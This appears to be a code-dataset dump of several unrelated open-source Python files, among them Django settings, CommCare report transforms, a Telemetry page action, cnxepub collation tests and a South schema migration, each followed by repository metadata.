# Honor the 'X-Forwarded-Proto' header for request.is_secure()
SECURE_PROXY_SSL_HEADER = ('HTTP_X_FORWARDED_PROTO', 'https')
# Set Root url
ROOT_URLCONF = 'goodnight_lead.urls'
# Set WSGI application path
WSGI_APPLICATION = 'goodnight_lead.wsgi.application'
# Internationalization
# https://docs.djangoproject.com/en/1.6/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static asset configuration
STATIC_ROOT = 'staticfiles'
STATIC_URL = '/static/'
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
)
STATICFILES_STORAGE = 'whitenoise.storage.CompressedManifestStaticFilesStorage'
STATICFILES_DIRS = (BASE_DIR / 'static',)
# We don't currently support uploading images from ckeditor, but we still
# need to define this variable
CKEDITOR_UPLOAD_PATH = 'ckeditor_uploads/'
# Default url for login page (override django default)
LOGIN_URL = '/login'
# Template configuration
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
]
},
},
]
| gpl-3.0 | -363,059,362,030,304,300 | 22.727273 | 79 | 0.702427 | false | 3.734499 | false | false | false |
qedsoftware/commcare-hq | corehq/apps/userreports/transforms/specs.py | 1 | 2806 | from decimal import Decimal
from dimagi.ext.jsonobject import DictProperty, JsonObject, StringProperty
from corehq.apps.userreports.specs import TypeProperty
from corehq.apps.userreports.transforms.custom.date import get_month_display, days_elapsed_from_date
from corehq.apps.userreports.transforms.custom.numeric import \
get_short_decimal_display
from corehq.apps.userreports.transforms.custom.users import (
get_user_display,
get_owner_display,
get_user_without_domain_display,
)
class Transform(JsonObject):
"""
Transforms provide an interface to take in an input value and output something else.
Useful if you need to transform data before saving or displaying it in some way.
"""
type = StringProperty(required=True, choices=['custom'])
_CUSTOM_TRANSFORM_MAP = {
'month_display': get_month_display,
'days_elapsed_from_date': days_elapsed_from_date,
'user_display': get_user_display,
'owner_display': get_owner_display,
'user_without_domain_display': get_user_without_domain_display,
'short_decimal_display': get_short_decimal_display,
}
class CustomTransform(JsonObject):
"""
Custom transforms provide an interface to a limited set of known, custom operations
to transform data. Examples of custom transforms include things like looking up a username
or owner name from the ID.
"""
type = TypeProperty('custom')
custom_type = StringProperty(required=True, choices=_CUSTOM_TRANSFORM_MAP.keys())
def get_transform_function(self):
return _CUSTOM_TRANSFORM_MAP[self.custom_type]
def transform(self, value):
return self.get_transform_function()(value)
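    # Usage sketch (illustrative values; 'month_display' is one of the keys
    # in _CUSTOM_TRANSFORM_MAP above):
    #
    #   transform = CustomTransform.wrap(
    #       {'type': 'custom', 'custom_type': 'month_display'})
    #   transform.transform(7)  # month number -> display name, per
    #                           # get_month_display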
class DateFormatTransform(Transform):
type = TypeProperty('date_format')
format = StringProperty(required=True)
def get_transform_function(self):
def transform_function(value):
try:
return value.strftime(self.format)
except Exception:
return value
return transform_function
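    # Minimal usage sketch (format and value are arbitrary examples):
    #
    #   from datetime import datetime
    #   transform = DateFormatTransform.wrap(
    #       {'type': 'date_format', 'format': '%Y-%m'})
    #   transform.get_transform_function()(datetime(2017, 1, 15))  # '2017-01'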
class NumberFormatTransform(Transform):
type = TypeProperty('number_format')
format_string = StringProperty(required=True)
def get_transform_function(self):
def transform_function(value):
try:
if isinstance(value, basestring):
value = Decimal(value)
return self.format_string.format(value)
except Exception:
return value
return transform_function
class TranslationTransform(Transform):
type = TypeProperty('translation')
translations = DictProperty()
def get_transform_function(self):
# For now, use the identity function
def transform_function(value):
return value
return transform_function
| bsd-3-clause | 863,535,659,692,166,900 | 30.177778 | 100 | 0.692801 | false | 4.350388 | false | false | false |
gazfm/CaptureRoyaleTestServer | CaptureRoyalTestServer/settings.py | 1 | 2760 | """
Django settings for CaptureRoyalTestServer project.
Generated by 'django-admin startproject' using Django 1.8.
For more information on this file, see
https://docs.djangoproject.com/en/1.8/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.8/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.8/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'y&nd31a-z5c9@rgp-p47wvettq@%38(p9g7%oq#*q=2-aa$m5f'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'caproy',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'django.middleware.security.SecurityMiddleware',
)
ROOT_URLCONF = 'CaptureRoyalTestServer.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'CaptureRoyalTestServer.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.8/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.8/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.8/howto/static-files/
STATIC_URL = '/static/'
TEMPLATE_DIRS = (
os.path.join(BASE_DIR, 'templates'),
)
| apache-2.0 | 1,262,952,607,708,974,000 | 24.803738 | 71 | 0.693841 | false | 3.445693 | false | false | false
Evervolv/android_external_chromium_org | tools/telemetry/telemetry/page/actions/click_element.py | 33 | 1716 | # Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
from telemetry.core import util
from telemetry.core import exceptions
from telemetry.page import page as page_module
from telemetry.page.actions import page_action
class ClickElementAction(page_action.PageAction):
def __init__(self, attributes=None):
super(ClickElementAction, self).__init__(attributes)
def RunAction(self, page, tab, previous_action):
def DoClick():
assert hasattr(self, 'selector') or hasattr(self, 'text')
if hasattr(self, 'selector'):
code = 'document.querySelector(\'' + self.selector + '\').click();'
try:
tab.ExecuteJavaScript(code)
except exceptions.EvaluateException:
raise page_action.PageActionFailed(
'Cannot find element with selector ' + self.selector)
else:
callback_code = 'function(element) { element.click(); }'
try:
util.FindElementAndPerformAction(tab, self.text, callback_code)
except exceptions.EvaluateException:
raise page_action.PageActionFailed(
'Cannot find element with text ' + self.text)
if hasattr(self, 'wait_for_navigate'):
tab.PerformActionAndWaitForNavigate(DoClick)
elif hasattr(self, 'wait_for_href_change'):
old_url = tab.EvaluateJavaScript('document.location.href')
DoClick()
util.WaitFor(lambda: tab.EvaluateJavaScript(
'document.location.href') != old_url, 60)
else:
DoClick()
page_module.Page.WaitForPageToLoad(self, tab, 60)
tab.WaitForDocumentReadyStateToBeInteractiveOrBetter()
| bsd-3-clause | -2,990,962,649,633,745,400 | 39.857143 | 75 | 0.68648 | false | 4.07601 | false | false | false |
5monkeys/djedi-cms | djedi/utils/templates.py | 1 | 1151 | import json
from django.core.exceptions import ImproperlyConfigured
from ..compat import NoReverseMatch, render, render_to_string, reverse
def render_embed(nodes=None, request=None):
context = {}
if nodes is None:
try:
prefix = request.build_absolute_uri("/").rstrip("/")
context.update(
{
"cms_url": prefix + reverse("admin:djedi:cms"),
"exclude_json_nodes": True,
}
)
output = render(request, "djedi/cms/embed.html", context)
except NoReverseMatch:
raise ImproperlyConfigured(
"Could not find djedi in your url conf, "
"enable django admin or include "
"djedi.urls within the admin namespace."
)
else:
context.update(
{
"cms_url": reverse("admin:djedi:cms"),
"exclude_json_nodes": False,
"json_nodes": json.dumps(nodes).replace("</", "\\x3C/"),
}
)
output = render_to_string("djedi/cms/embed.html", context)
return output
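# Illustrative call sites (hypothetical view code and node URI):
#
#   render_embed(request=request)                          # full embed page
#   render_embed(nodes={'i18n://page/title.txt': 'Home'})  # inlined node JSON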
| bsd-3-clause | -2,862,257,654,988,312,000 | 29.289474 | 72 | 0.523892 | false | 4.513725 | false | false | false |
Connexions/cnx-epub | cnxepub/tests/test_collation.py | 1 | 13693 | # -*- coding: utf-8 -*-
# ###
# Copyright (c) 2016, Rice University
# This software is subject to the provisions of the GNU Affero General
# Public License version 3 (AGPLv3).
# See LICENCE.txt for details.
# ###
import os
import io
import unittest
try:
from unittest import mock
except ImportError:
import mock
from lxml import etree
from .test_models import BaseModelTestCase
here = os.path.abspath(os.path.dirname(__file__))
TEST_DATA_DIR = os.path.join(here, 'data')
class ReconstituteTestCase(unittest.TestCase):
maxDiff = None
def test_xhtml(self):
page_path = os.path.join(TEST_DATA_DIR, 'desserts-single-page.xhtml')
with open(page_path) as html:
from cnxepub.collation import reconstitute
desserts = reconstitute(html)
self.check_desserts(desserts)
def test_html(self):
page_path = os.path.join(TEST_DATA_DIR, 'desserts-single-page.html')
with open(page_path) as html:
from cnxepub.collation import reconstitute
desserts = reconstitute(html)
self.check_desserts(desserts)
def check_desserts(self, desserts):
"""Assertions for the desserts model"""
from ..models import model_to_tree
self.assertEqual('Desserts', desserts.metadata['title'])
self.assertEqual({
'shortId': None,
'id': '[email protected]',
'contents': [{
'shortId': 'frt',
'id': '[email protected]',
'contents': [{
'shortId': None,
'id': '[email protected]',
'title': 'Apple'
},
{
'shortId': None,
'id': '[email protected]',
'title': u'<span>1.1</span> <span>|</span> <span>レモン</span>'
},
{
'shortId': '[email protected]',
'id': '[email protected]',
'contents': [{
'shortId': None,
'id': '[email protected]',
'title': 'Lemon'
}
],
'title': '<span>Chapter</span> <span>2</span> <span>citrus</span>'
}
],
'title': 'Fruity'
},
{
'shortId': None,
'id': '[email protected]',
'title': u'チョコレート'
},
{
'shortId': None,
'id': '[email protected]',
'title': 'Extra Stuff'
}
],
'title': 'Desserts'}, model_to_tree(desserts))
base_metadata = {
u'publishers': [],
u'created': None, # '2016/03/04 17:05:20 -0500',
u'revised': None, # '2013/03/05 09:35:24 -0500',
u'authors': [
{u'type': u'cnx-id',
u'name': u'Good Food',
u'id': u'yum'}],
u'editors': [],
u'copyright_holders': [],
u'illustrators': [],
u'subjects': [u'Humanities'],
u'translators': [],
u'keywords': [u'Food', u'デザート', u'Pudding'],
u'title': u'チョコレート',
u'license_text': u'CC-By 4.0',
u'license_url': u'http://creativecommons.org/licenses/by/4.0/',
# 'version': 'draft',
u'language': 'en',
u'print_style': None,
u'cnx-archive-uri': None,
u'cnx-archive-shortid': None,
u'derived_from_title': None,
u'derived_from_uri': None,
u'version': None,
u'canonical_book_uuid': None,
u'slug': None,
}
fruity = desserts[0]
self.assertEqual('Binder', fruity.__class__.__name__)
self.assertEqual('Fruity', fruity.metadata['title'])
apple = fruity[0]
self.assertEqual('Document', apple.__class__.__name__)
metadata = base_metadata.copy()
metadata['title'] = 'Apple'
metadata['version'] = '1.3'
metadata['revised'] = '2013/03/05 09:35:24 -0500'
metadata['canonical_book_uuid'] = 'ea4244ce-dd9c-4166-9c97-acae5faf0ba1'
apple_metadata = apple.metadata.copy()
summary = etree.fromstring(apple_metadata.pop('summary'))
self.assertEqual('{http://www.w3.org/1999/xhtml}p', summary.tag)
self.assertEqual('summary', summary.text)
self.assertEqual(metadata, apple_metadata)
lemon = fruity[1]
self.assertEqual('Document', lemon.__class__.__name__)
metadata = base_metadata.copy()
metadata['title'] = 'Lemon'
metadata['version'] = '1.3'
metadata['revised'] = '2013/03/05 09:35:24 -0500'
apple_metadata = apple.metadata.copy()
lemon_metadata = lemon.metadata.copy()
summary = etree.fromstring(lemon_metadata.pop('summary'))
self.assertEqual('{http://www.w3.org/1999/xhtml}p', summary.tag)
self.assertEqual('summary', summary.text)
self.assertEqual(metadata, lemon_metadata)
citrus = fruity[2]
self.assertEqual('Binder', citrus.__class__.__name__)
self.assertEqual(citrus.metadata['title'], 'Citrus')
self.assertEqual(lemon.metadata, citrus[0].metadata)
chocolate = desserts[1]
self.assertEqual('Document', chocolate.__class__.__name__)
chocolate_metadata = chocolate.metadata.copy()
summary = etree.fromstring(chocolate_metadata.pop('summary'))
self.assertEqual('{http://www.w3.org/1999/xhtml}p', summary.tag)
self.assertEqual('summary', summary.text)
metadata = base_metadata.copy()
metadata['title'] = u'チョコレート'
metadata['version'] = '1.3'
metadata['revised'] = '2013/03/05 09:35:24 -0500'
apple_metadata = apple.metadata.copy()
self.assertEqual(metadata, chocolate_metadata)
extra = desserts[2]
self.assertEqual('CompositeDocument', extra.__class__.__name__)
extra_metadata = extra.metadata.copy()
summary = etree.fromstring(extra_metadata.pop('summary'))
self.assertEqual('{http://www.w3.org/1999/xhtml}p', summary.tag)
self.assertEqual('summary', summary.text)
metadata = base_metadata.copy()
metadata['title'] = 'Extra Stuff'
metadata['version'] = '1.3'
metadata['revised'] = '2013/03/05 09:35:24 -0500'
self.assertEqual(metadata, extra_metadata)
class CollateTestCase(BaseModelTestCase):
@property
def target(self):
from cnxepub.collation import collate
return collate
def test(self):
binder = self.make_binder(
'8d75ea29',
metadata={'version': '3', 'title': 'Book One',
'license_url': 'http://my.license',
'cnx-archive-uri': 'bad183c3-8776-4a6d-bb02-3b11e0c26aaf'},
nodes=[
self.make_document(
id="e78d4f90",
content=b"<body><p>document one</p></body>",
metadata={'version': '3',
'title': "Document One",
'license_url': 'http://my.license'}),
self.make_document(
id="3c448dc6",
content=b"<body><p>document two</p></body>",
metadata={'version': '1',
'title': "Document Two",
'license_url': 'http://my.license'})])
# Append a ruleset to the binder.
ruleset = io.BytesIO(b" ")
resource = self.make_resource('ruleset', ruleset, 'text/css',
filename='ruleset.css')
binder.resources.append(resource)
def mock_easybake(ruleset, in_html, out_html):
from lxml import etree
html = etree.parse(in_html)
# Add in a composite-page with title "Composite One" here.
body = html.getroot().xpath(
'//xhtml:body',
namespaces={'xhtml': 'http://www.w3.org/1999/xhtml'})[0]
comp_elm = etree.SubElement(body, 'div')
comp_elm.attrib['data-type'] = 'composite-page'
comp_elm.append(etree.fromstring("""
<div data-type="metadata">
<h1 data-type="document-title" itemprop="name">Composite One</h1>
<div class="authors">
By:
Edited by:
Illustrated by:
Translated by:
</div>
<div class="publishers">
Published By:
</div>
<div class="permissions">
<p class="license">
Licensed:
<a href="" itemprop="dc:license,lrmi:useRightsURL" data-type="license"/>
</p>
</div>
<div class="description" itemprop="description" data-type="description"> </div>
</div>"""))
etree.SubElement(comp_elm, 'p').text = "composite document"
# Add the composite-page to the table-of-contents.
toc = html.getroot().xpath(
"//xhtml:*[@id='toc']/xhtml:ol",
namespaces={'xhtml': 'http://www.w3.org/1999/xhtml'})[0]
etree.SubElement(toc, 'li').append(etree.fromstring('<a>Composite One</a>'))
out_html.write(etree.tostring(html))
with mock.patch('cnxepub.collation.easybake') as easybake:
easybake.side_effect = mock_easybake
fake_ruleset = 'div::after {contents: "test"}'
collated_binder = self.target(binder, fake_ruleset)
# Check for the appended composite document
self.assertEqual(len(collated_binder), 3)
self.assertEqual(collated_binder[2].id, 'a9428a6c-5d31-5425-8335-8a2e780651e0')
self.assertEqual(collated_binder[2].metadata['title'],
'Composite One')
def test_without_ruleset(self):
binder = self.make_binder(
'8d75ea29',
metadata={'version': '3', 'title': "Book One",
'license_url': 'http://my.license'},
nodes=[
self.make_document(
id="e78d4f90",
metadata={'version': '3',
'title': "Document One",
'license_url': 'http://my.license'}),
self.make_document(
id="3c448dc6",
metadata={'version': '1',
'title': "Document Two",
'license_url': 'http://my.license'})])
result = self.target(binder)
self.assertIs(binder, result)
def test_with_ruleset(self):
binder = self.make_binder(
'8d75ea29',
metadata={'version': '3', 'title': "Book One",
'license_url': 'http://my.license'},
nodes=[
self.make_document(
id="e78d4f90",
content=b"<body><span>document one</span></body>",
metadata={'version': '3',
'title': "Document One",
'license_url': 'http://my.license'}),
self.make_document(
id="3c448dc6",
content=b"<body><span>document two</span></body>",
metadata={'version': '1',
'title': "Document Two",
'license_url': 'http://my.license'})])
# Append a ruleset to the binder.
ruleset_bytes = b"""\
div[data-type='page'] > div[data-type='metadata'] {
copy-to: eob-all
}
div[data-type='page'] span {
copy-to: eob-all
}
body::after {
content: pending(eob-all);
class: end-of-book;
data-type: composite-page;
container: div;
}
/* copied from cte books/rulesets/common/toc.less */
body > div[data-type="page"],
body > div[data-type="composite-page"]:pass(20) {
string-set: page-id attr(id);
}
body > div[data-type="page"] > div[data-type="metadata"] > \
h1[data-type='document-title'],
body > div[data-type="composite-page"] > div[data-type="metadata"] > \
h1[data-type='document-title']:pass(20) {
copy-to: page-title;
}
body > div[data-type="page"]::after,
body > div[data-type="composite-page"]:pass(20)::after {
content: pending(page-title);
attr-href: "#" string(page-id);
container: a;
move-to: page-link;
}
body > div[data-type="page"]::after,
body > div[data-type="composite-page"]:pass(20)::after {
content: pending(page-link);
move-to: eob-toc;
container: li;
}
nav#toc:pass(30) {
content: '';
}
nav#toc:pass(30)::after {
content: pending(eob-toc);
container: ol;
}
"""
resource = self.make_resource('ruleset',
io.BytesIO(ruleset_bytes),
'text/css',
filename='ruleset.css')
binder.resources.append(resource)
collated_binder = self.target(binder, ruleset_bytes)
# Check for the appended composite document
self.assertEqual(len(collated_binder), 3)
self.assertEqual(collated_binder[2].metadata['title'],
'Document One')
| agpl-3.0 | 3,295,563,899,847,968,300 | 36.897222 | 93 | 0.509859 | false | 3.72048 | true | false | false |
brjadams/basenoter | basenotes/notes/migrations/0005_auto__del_splitclient__add_splittrans__del_field_parfumsizes_size_oz__.py | 1 | 13307 | # -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Deleting model 'SplitClient'
db.delete_table(u'notes_splitclient')
# Adding model 'SplitTrans'
db.create_table(u'notes_splittrans', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('split', self.gf('django.db.models.fields.related.ForeignKey')(related_name='client', to=orm['notes.Split'])),
('user', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['auth.User'])),
))
db.send_create_signal(u'notes', ['SplitTrans'])
# Deleting field 'ParfumSizes.size_oz'
db.delete_column(u'notes_parfumsizes', 'size_oz')
# Adding field 'ParfumSizes.size_ml'
db.add_column(u'notes_parfumsizes', 'size_ml',
self.gf('django.db.models.fields.DecimalField')(default=0, max_digits=4, decimal_places=2),
keep_default=False)
# Deleting field 'Split.min_ml'
db.delete_column(u'notes_split', 'min_ml')
# Deleting field 'Split.pp_ml'
db.delete_column(u'notes_split', 'pp_ml')
# Adding field 'Split.bottle_price'
db.add_column(u'notes_split', 'bottle_price',
self.gf('django.db.models.fields.related.ForeignKey')(default=1, related_name='decanted', to=orm['notes.ParfumSizes']),
keep_default=False)
# Adding field 'Split.splits'
db.add_column(u'notes_split', 'splits',
self.gf('django.db.models.fields.PositiveIntegerField')(default=0),
keep_default=False)
# Adding field 'Split.split_size'
db.add_column(u'notes_split', 'split_size',
self.gf('django.db.models.fields.DecimalField')(default=0, max_digits=8, decimal_places=2),
keep_default=False)
def backwards(self, orm):
# Adding model 'SplitClient'
db.create_table(u'notes_splitclient', (
('user', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['auth.User'])),
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('split', self.gf('django.db.models.fields.related.ForeignKey')(related_name='client', to=orm['notes.Split'])),
))
db.send_create_signal(u'notes', ['SplitClient'])
# Deleting model 'SplitTrans'
db.delete_table(u'notes_splittrans')
# Adding field 'ParfumSizes.size_oz'
db.add_column(u'notes_parfumsizes', 'size_oz',
self.gf('django.db.models.fields.DecimalField')(default=0, max_digits=4, decimal_places=2),
keep_default=False)
# Deleting field 'ParfumSizes.size_ml'
db.delete_column(u'notes_parfumsizes', 'size_ml')
# Adding field 'Split.min_ml'
db.add_column(u'notes_split', 'min_ml',
self.gf('django.db.models.fields.PositiveIntegerField')(default=0),
keep_default=False)
# Adding field 'Split.pp_ml'
db.add_column(u'notes_split', 'pp_ml',
self.gf('django.db.models.fields.DecimalField')(default=0, max_digits=8, decimal_places=2),
keep_default=False)
# Deleting field 'Split.bottle_price'
db.delete_column(u'notes_split', 'bottle_price_id')
# Deleting field 'Split.splits'
db.delete_column(u'notes_split', 'splits')
# Deleting field 'Split.split_size'
db.delete_column(u'notes_split', 'split_size')
models = {
u'auth.group': {
'Meta': {'object_name': 'Group'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
u'auth.permission': {
'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Group']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Permission']"}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'notes.classification': {
'Meta': {'object_name': 'Classification'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
u'notes.currency': {
'Meta': {'object_name': 'Currency'},
'country': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '10'})
},
u'notes.house': {
'Meta': {'object_name': 'House'},
'abbrev_name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'bio_url': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'display_name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'founded': ('django.db.models.fields.DateField', [], {}),
'founder': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'national_origin': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'website': ('django.db.models.fields.URLField', [], {'max_length': '200'})
},
u'notes.likeditem': {
'Meta': {'object_name': 'LikedItem'},
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'liked_by': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"}),
'object_id': ('django.db.models.fields.PositiveIntegerField', [], {})
},
u'notes.note': {
'Meta': {'object_name': 'Note'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'notes': ('django.db.models.fields.TextField', [], {}),
'resource': ('django.db.models.fields.URLField', [], {'max_length': '200'})
},
u'notes.parfum': {
'Meta': {'object_name': 'Parfum'},
'classification': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['notes.Classification']", 'symmetrical': 'False'}),
'house': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'parfums'", 'to': u"orm['notes.House']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'notes_base': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'base_notes'", 'symmetrical': 'False', 'to': u"orm['notes.Note']"}),
'notes_heart': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'heart_notes'", 'symmetrical': 'False', 'to': u"orm['notes.Note']"}),
'notes_top': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'top_notes'", 'symmetrical': 'False', 'to': u"orm['notes.Note']"}),
'perfumer': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'parfums'", 'blank': 'True', 'to': u"orm['notes.Perfumer']"})
},
u'notes.parfumsizes': {
'Meta': {'object_name': 'ParfumSizes'},
'currency': ('django.db.models.fields.CharField', [], {'max_length': '10'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'parfum': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'parfum_sizes'", 'symmetrical': 'False', 'to': u"orm['notes.Parfum']"}),
'price': ('django.db.models.fields.DecimalField', [], {'max_digits': '8', 'decimal_places': '2'}),
'size_ml': ('django.db.models.fields.DecimalField', [], {'max_digits': '4', 'decimal_places': '2'})
},
u'notes.perfumer': {
'Meta': {'object_name': 'Perfumer'},
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200'})
},
u'notes.review': {
'Meta': {'object_name': 'Review'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'item': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'reviews'", 'to': u"orm['notes.Parfum']"}),
'review': ('django.db.models.fields.TextField', [], {}),
'reviewed_by': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'reviews'", 'to': u"orm['auth.User']"})
},
u'notes.split': {
'Meta': {'object_name': 'Split'},
'bottle': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'decanted'", 'to': u"orm['notes.Parfum']"}),
'bottle_price': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'decanted'", 'to': u"orm['notes.ParfumSizes']"}),
'host': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'host'", 'to': u"orm['auth.User']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'split_size': ('django.db.models.fields.DecimalField', [], {'max_digits': '8', 'decimal_places': '2'}),
'splits': ('django.db.models.fields.PositiveIntegerField', [], {})
},
u'notes.splittrans': {
'Meta': {'object_name': 'SplitTrans'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'split': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'client'", 'to': u"orm['notes.Split']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"})
}
}
complete_apps = ['notes']
| gpl-3.0 | -2,967,022,694,690,005,500 | 60.893023 | 195 | 0.555723 | false | 3.596486 | false | false | false |
atc-/pyela | pyela/el/net/parsers.py | 1 | 13131 | # Copyright 2008 Alex Collins
#
# This file is part of Pyela.
#
# Pyela is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Pyela is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Pyela. If not, see <http://www.gnu.org/licenses/>.
"""Numerous objects for parsing the messages (raw bytes) from a server
into their relevant format for use with the rest of the API.
The MessageParser base class defines common functionality for using these
objects without prior knowledge of the instance at runtime.
"""
import logging
import struct
import time
from pyela.el.common.actors import ELActor
